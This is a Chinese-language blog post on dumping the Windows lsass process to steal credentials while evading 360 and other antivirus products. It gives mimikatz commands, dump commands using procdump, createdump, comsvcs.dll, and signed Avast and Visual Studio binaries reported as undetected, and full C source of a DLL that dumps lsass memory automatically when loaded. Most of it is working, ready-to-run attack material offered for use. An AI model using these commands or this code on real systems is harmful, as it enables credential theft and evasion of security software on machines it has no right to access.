绕过360实现lsass转储

2022-04-18 13:16:19 浏览数 (2)

前言

获取Windows用户的凭证信息是渗透过程中至关重要的一步。

没杀软,只要有权限想怎么读就怎么读。

有杀软,得用一些特别的技巧。

注:本机所有测试均为物理机,且为最新版AV

Mimikatz直接读取Lsass进程

权限提升

代码语言:txt复制
privilege::debug

抓取密码

代码语言:txt复制
sekurlsa::logonpasswords
image-20220411145456534.pngimage-20220411145456534.png

但如果此时目标机器上有AV,必定将收到拦截

image-20220411145304591.pngimage-20220411145304591.png

此时mimikatz必须免杀。

一般来说,目标机器有杀软的存在,更倾向于离线解析密码。

白名单文件dump

首先说三个微软签名的白名单程序

  1. Procdump.exe
  2. SQLDumper.exe
  3. createdump.exe

Procdump.exe(no)

尽管procdump拥有微软签名,但大部分AV厂商对此并不买账。

image-20220411151942096.pngimage-20220411151942096.png
代码语言:txt复制
procdump.exe  -ma lsass.exe 1.txt
image-20220411151730646.pngimage-20220411151730646.png

SQLDumper.exe也是一样的

createdump.exe(no)

createdump.exe随着.NET5出现的,本身是个native binary

虽然有签名同样遭到AV查杀

image-20220411153928918.pngimage-20220411153928918.png
代码语言:txt复制
createdump.exe -u -f lsass.dmp lsass[PID]
image-20220411153546445.pngimage-20220411153546445.png

Rundll32.exe(no)

使用rundll32直接执行comsvcs.dll的导出函数MiniDump来Dump进程内存

代码语言:txt复制
rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump (Get-Process lsass).id Desktoplsass-comsvcs.dmp full

同样被查杀

image-20220411154145618.pngimage-20220411154145618.png

avdump.exe(yes)

AvDump.exeAvast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。

image-20220411154751497.pngimage-20220411154751497.png

默认路径为:

代码语言:txt复制
C:Program FilesAvast SoftwareAvast
image-20220411154651575.pngimage-20220411154651575.png
代码语言:txt复制
AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

成功dump并解密,全程数字杀软无感。

image-20220411155527628.pngimage-20220411155527628.png

DumpMinitool.exe(yes)

此exe为近日mr.d0x的某推上分享了的一个LOLBIN,通过vs2022里的DumpMinitool.exe来导出lsass进程。

image-20220411160252764.pngimage-20220411160252764.png

路径为:

代码语言:txt复制
C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensions
image-20220411161251476.pngimage-20220411161251476.png

数字杀软全程无感

代码语言:txt复制
DumpMinitool.exe --file 1.txt --processId 980 --dumpType Full
image-20220411161328099.pngimage-20220411161328099.png

其他方式

SilentProcessExit进行Dump(no)

具体原理参考文章:利用SilentProcessExit机制dump内存

Silent Process Exit,即静默退出。而这种调试技术,可以派生 werfault.exe进程,可以用来运行任意程序或者也可以用来转存任意进程的内存文件或弹出窗口。

但该方式需要修改注册表,修改注册表操作将会被查杀。

image-20220411170407188.pngimage-20220411170407188.png

编写Dump Lsass的DLL(yes)

  1. 获取Debug权限
  2. 找到lsass的PID
  3. 使用MiniDump或MiniDumpWriteDump进行内存dump
代码语言:c复制
#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>

typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);

int GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

	if (Process32First(hSnapshot, &entry)) {
		while (Process32Next(hSnapshot, &entry)) {
			if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
				return entry.th32ProcessID;
			}
		}
	}

	CloseHandle(hSnapshot);
	return 0;
}

void GetDebugPrivilege()
{
	BOOL fOk = FALSE;
	HANDLE hToken;
	if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
	{
		TOKEN_PRIVILEGES tp;
		tp.PrivilegeCount = 1;
		LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
		tp.Privileges[0].Attributes = true ? SE_PRIVILEGE_ENABLED : 0;
		AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
		fOk = (GetLastError() == ERROR_SUCCESS);
		CloseHandle(hToken);
	}
}

void DumpLsass()
{
	wchar_t  ws[100];
	_MiniDumpW MiniDumpW;
	
	MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
	swprintf(ws, 100, L"%u %hs", GetLsassPid(), "c:\windows\temp\temp.bin full");

	GetDebugPrivilege();

	MiniDumpW(0, 0, ws);
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		DumpLsass();
		break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

成功dump,数字杀软无感。

image-20220411172246371.pngimage-20220411172246371.png

0 人点赞